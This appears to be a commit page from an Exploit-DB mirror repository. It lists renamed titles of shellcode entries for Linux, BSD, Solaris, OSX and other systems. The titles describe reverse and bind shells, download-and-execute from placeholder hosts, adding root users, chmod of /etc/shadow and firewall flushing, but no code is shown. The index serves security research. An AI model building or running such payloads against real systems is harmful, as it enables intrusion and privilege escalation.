bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-17

Browse source 
78 changes to exploits/shellcodes

OBS studio 20.1.3 - Local Buffer Overflow
OBS Studio 20.1.3 - Local Buffer Overflow

Seagate Personal Cloud - Multiple Vulnerabilities

AIX - execve /bin/sh Shellcode (88 bytes)
AIX - execve(/bin/sh) Shellcode (88 bytes)
BSD/PPC - execve /bin/sh Shellcode (128 bytes)
BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)
BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)
BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)
BSD/x86 - execve /bin/sh Shellcode (27 bytes)
BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)
BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)
BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)
BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)
BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)
BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)
BSDi/x86 - execve /bin/sh Shellcode (45 bytes)
BSDi/x86 - execve /bin/sh Shellcode (46 bytes)
BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)
FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)
BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)
BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)
BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)

FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)

FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)
FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)
FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)
FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)
FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)
FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)
FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)
FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes)
FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)
FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)
FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)
FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)
FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)
Linux/x86 - execve Null-Free Shellcode (Generator)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86 - execve() Null-Free Shellcode (Generator)

Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)
Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)

HP-UX - execve /bin/sh Shellcode (58 bytes)
HP-UX - execve(/bin/sh) Shellcode (58 bytes)

Linux/PPC - execve /bin/sh Shellcode (60 bytes)
Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)

Linux/PPC - execve /bin/sh Shellcode (112 bytes)
Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)

Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)
Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)
Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)
Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)
Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)
Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)
Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)
Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)
Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)

Linux/x86 - execve read Shellcode (92 bytes)
Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)
Linux/x86 - execve /bin/sh Shellcode (22 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)

Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)

Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)

Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)

Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2)
Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)
Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)
Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)
Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)
Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)
Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)

Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes)

Linux/x86 - setreuid + execve Shellcode (31 bytes)
Linux/x86 - setreuid() + execve() Shellcode (31 bytes)

Linux/x86 - execve code Shellcode (23 bytes)
Linux/x86 - execve() Shellcode (23 bytes)
Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)
Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)
Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)
Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)
Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)
Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)
Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)
Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)
Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)
BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)
Linux/x86 - execve /bin/sh Shellcode (29 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)
Linux/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/x86 - execve /bin/sh Shellcode (30 bytes)
Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (29 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3)
Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)
Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)
Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)
Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)
OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes)
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes)
Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)
Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)

Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)
Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)
Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)
Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)
BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)
Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)
Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)
BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)
NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)
OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)
NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)
OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)

OSX/PPC - execve /bin/sh Shellcode (72 bytes)
OSX/PPC - execve(/bin/sh) Shellcode (72 bytes)

OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)
OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes)

OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)
OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)

Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid + execve Shellcode (56 bytes)
Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)
Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)
Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)
Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)
Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)
UnixWare - execve /bin/sh Shellcode (95 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)

Linux/x86 - execve Shellcode (51 bytes)
Linux/x86 - execve() Shellcode (51 bytes)

Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)
Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)

Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)

Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)
Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)
Linux/x86 - execve /bin/sh Shellcode (8 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)

Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)

Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)
Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)

Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)
Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)

Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)
Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)

Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)
Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)

Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)

Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)
Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)

Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)
Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)
Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)
Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)
Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)

Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)
Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)

Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)

Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode

OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)
OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
OSX - Universal ROP + Reverse TCP Shell Shellcode
Linux/MIPS - execve /bin/sh Shellcode (52 bytes)
OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode
Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)

Linux/MIPS - execve /bin/sh Shellcode (48 bytes)
Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode

Linux/x86 - execve /bin/dash Shellcode (42 bytes)
Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)

Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)
Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)

Linux/MIPS - execve /bin/sh Shellcode (36 bytes)
Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)

Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)

Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)

Linux/x86 - execve /bin/sh Shellcode (35 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)
Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)
Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)
Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)
Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)
Linux/x86 - execve /bin/sh Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)
Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)

Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)

Linux/x86 - execve /bin/sh Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)
Linux/x86-64 - execve Encoded Shellcode (57 bytes)
Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode
Linux/x86-64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode

Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode

OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)

Linux/x86 - execve /bin/bash Shellcode (31 bytes)
Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)

Linux/x86-64 - execve Shellcode (22 bytes)
Linux/x86-64 - execve() Shellcode (22 bytes)

Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)
Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)

Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)

Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)

Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)
Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)
Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)

Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)
Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)

Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode
Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode

Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)
OSX/PPC - Remote findsock by recv() Key Shellcode
OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode
OSX/PPC - Stager Sock Find MSG_PEEK Shellcode
OSX/PPC - Stager Sock Find Shellcode
OSX/PPC - Stager Sock Reverse Shellcode
OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)
OSX/PPC - execve(/bin/sh) Shellcode
OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)
OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)
BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)
Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)
Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)
Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode
Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode
Solaris/SPARC - Bind TCP Shell Shellcode
Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)
Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)
BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)
OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes)
BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)
BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes)
BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)
Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes)
BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)
BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)
BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)
Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)
Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)
Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)
Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)
Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)
Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)
Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)
Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)
Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)
Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)
Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)

Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)
Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)

Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)
Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)

Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)

Linux/x86 - execve /bin/dash Shellcode (30 bytes)
Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)

FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)

FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)
FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)

FreeBSD - reboot() Shellcode (15 Bytes)
FreeBSD/x86 - reboot() Shellcode (15 bytes)

Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)
Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)

Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
